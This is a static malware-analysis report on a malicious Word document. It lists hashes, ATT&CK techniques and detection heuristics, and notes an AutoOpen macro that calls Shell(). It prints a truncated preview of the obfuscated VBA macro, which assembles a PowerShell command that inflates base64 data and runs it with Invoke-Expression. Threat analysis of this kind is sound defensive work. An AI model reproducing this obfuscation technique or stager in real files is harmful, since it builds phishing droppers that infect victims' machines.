Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 182d24bec966cb46…

MALICIOUS

Office (OLE)

81.0 KB Created: 2018-05-22 21:01:00 Authoring application: Microsoft Office Word First seen: 2018-06-14
MD5: 3cde53ff4f9826a11d66eb426e8a1117 SHA-1: 0162db007053e1d7265ff385931217c9cb9a7728 SHA-256: 182d24bec966cb46923e6284bafa49ab355597bfb6cc610faa29b32c47ababbe
144 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The AutoOpen macro triggers the execution of a Shell() command, which is highly indicative of downloading and executing a second-stage payload. The presence of a 'macros.bas' file further supports this, and the technique used is likely Spearphishing Attachment.

Heuristics 6

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 72946 bytes
SHA-256: 13c9663719769b3c6be38011fea83dfd07444420dfed66806048948b8dd800e8
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "KTJwjlZcGzv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function bvfcE()

On Error Resume Next
pizLQb = BibjKCnC + CSng(700354) + 868271 / Sin(965063 - CByte(699836) / 653062 - Round(700354)) + vzzczvA * lpDBtu - (868271 + 965063 + 699836 - 7003540)
Set KdvtzRLTR = jzjJXMq
sFWDrlE = "l9ozfTHzowpDmhIjzX(neW-oBjeCt3emUl4cTchaTeQpDershell  Iex6KDPUXMr3 1cfFMsS9DuMUjo"
jlshibrI = Left(Right(sFWDrlE, 73), 2) + CStr(Left(Right(sFWDrlE, 36), 11)) + CStr(Left(Right(sFWDrlE, 64), 12)) + CStr(Left(Right(sFWDrlE, 15), 1)) + CStr(Left(Right(sFWDrlE, 8), 1))

lNEzA = "5R66D7HdjezXY9iyLSn5e240RYStEm.io.StrEaMReao4zptMbO4ApR3M6fMqER( (neWC5srS05aFvS1OWTeXRx-oBmmFUh"
TFCNHnQE = Left(Right(lNEzA, 71), 18) + CStr(Left(Right(lNEzA, 89), 1)) + CStr(Left(Right(lNEzA, 35), 8)) + Left(Right(lNEzA, 8), 3) + CStr(Left(Right(lNEzA, 88), 2))

bBKMTO = "5R66D7HaITAM(9iyLSn5e240RrHt43bCt  sYsTEM.IO.COmprESSpR3M6fMqOVHrOk1vC5srS05on.DeflaTERx6A9mmFUh3AxgEoxAWWDhpSTREDKRr2dK"
FnIrapLUkSn = CStr(Left(Right(bBKMTO, 89), 22)) + CStr(Left(Right(bBKMTO, 112), 1)) + Left(Right(bBKMTO, 44), 10) + CStr(Left(Right(bBKMTO, 11), 4)) + Left(Right(bBKMTO, 110), 3)

mMtzWVIsm = "v55R.6D7HaKTzX [SySteM.Io0RrHt43bbnXDMemOr5ZRo4zptMbOyspR"
WGmakzIJh = Left(Right(mMtzWVIsm, 43), 11) + CStr(Left(Right(mMtzWVIsm, 53), 1)) + CStr(Left(Right(mMtzWVIsm, 20), 5)) + CStr(Left(Right(mMtzWVIsm, 4), 2))

iJScBAwRh = "5R66D7Hee6zXY9iyLSn5e240RTrEam][sySTEM.ConVo4zptMbO4ApR3M6fMqOVRt]::FROMrS05aFvS1OWTeXRx6A9BasUh3Ax"
HocrGoHf = Left(Right(iJScBAwRh, 74), 18) + CStr(Left(Right(iJScBAwRh, 92), 1)) + CStr(Left(Right(iJScBAwRh, 36), 9)) + Left(Right(iJScBAwRh, 8), 3) + CStr(Left(Right(iJScBAwRh, 91), 2))

VoOnQMNP = "5R66V1HaKTzXY9iy4stRINg( 'ZV43bbnXDWtSbLhb9pIzptMbO4ApR3M6EPqOV"
dECSwUoKCW = CStr(Left(Right(VoOnQMNP, 47), 12)) + CStr(Left(Right(VoOnQMNP, 59), 1)) + CStr(Left(Right(VoOnQMNP, 23), 5)) + Left(Right(VoOnQMNP, 5), 2) + CStr(Left(Right(VoOnQMNP, 58), 1))

qYUszw = Chr(43)
ppQisFOf = "5R66D7HaETklI9iyLSn5e240RrHt43b0v2HVVUdtgIO67UNDoruqKpR3M6fMqOVHrOk1vC5srS05qEk3SUI5GVRx6A9mmFUh3AxgEoxAWWDhpT7YxDKRr2dK"
nXpHuLj = CStr(Left(Right(ppQisFOf, 89), 22)) + CStr(Left(Right(ppQisFOf, 112), 1)) + Left(Right(ppQisFOf, 44), 10) + CStr(Left(Right(ppQisFOf, 11), 4)) + Left(Right(ppQisFOf, 110), 3)
jiTktIX = IwWKqmQ + CSng(686597) + 672561 / Sin(447873 - CByte(247017) / 97392 - Round(686597)) + ZaTwB * uKRdKahbCB - (672561 + 447873 + 247017 - 6865970)
Set swwAi = azswjnQcBY
RMTQDJZ = "v5rR66DYe3aTpXY9iyLSIxe240Rr3t"
nzoJQ = Left(Right(RMTQDJZ, 23), 6) + CStr(Left(Right(RMTQDJZ, 28), 1)) + CStr(Left(Right(RMTQDJZ, 10), 2)) + CStr(Left(Right(RMTQDJZ, 2), 1))

DWiwslJI = Chr(43)
VwiDLr = "v55E66D7HaK/N95dqBTSn5e240RrsrMzbbnXDWtSbO7ZR"
ZOOzKIkojY = Left(Right(VwiDLr, 34), 8) + CStr(Left(Right(VwiDLr, 42), 1)) + Left(Right(VwiDLr, 17), 4) + Left(Right(VwiDLr, 4), 2)

jEwfXoDtU = "v5vR66D7HaOzb94slyLSn5e24Wu4Ht43bbnXeGt"
VQzEMDEAuzs = CStr(Left(Right(jEwfXoDtU, 29), 7)) + Left(Right(jEwfXoDtU, 37), 1) + Left(Right(jEwfXoDtU, 14), 3) + Left(Right(jEwfXoDtU, 3), 2)

dMtQSsp = Chr(43)
vkmEIJ = "5R66D7HajTd2c9iyLSn5e240RrHt43b4XzfBPtG7Bt3gNVw3/QhuhpR3M6fMqOVHrOk1vC5srS057xscvVqTHFRx6A9mmFUh3AxgEoxAWWDhpu5hiDKRr2dK"
zrrbaoa = CStr(Left(Right(vkmEIJ, 89), 22)) + CStr(Left(Right(vkmEIJ, 112), 1)) + Left(Right(vkmEIJ, 44), 10) + CStr(Left(Right(vkmEIJ, 11), 4)) + Left(Right(vkmEIJ, 110), 3)

zkHnEDd = "v55S66D7HaKNmAfnF0MSn5e240RrC4FgbbnXDWtSbJaZR"
zDJIkUHnX = Left(Right(zkHnEDd, 34), 8) + CStr(Left(Right(zkHnEDd, 42), 1)) + Left(Right(zkHnEDd, 17), 4) + Left(Right(zkHnEDd, 4), 2)

lFnmT = "v53R66D7MCMTJmY9iyLSnzhg40RrHt4Cb"
mphINljsl = CStr(Left(Right(lFnmT, 25), 6)) + Left(Right(lFnmT, 31), 1) + CStr(Left(Right(lFnmT, 12), 3)) + CStr(Left(Right(lFnmT, 2), 1))
IEGtnFznq = GuhDmNGk + CSng(354576) + 923554 / Sin(831942 - CByte(68
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.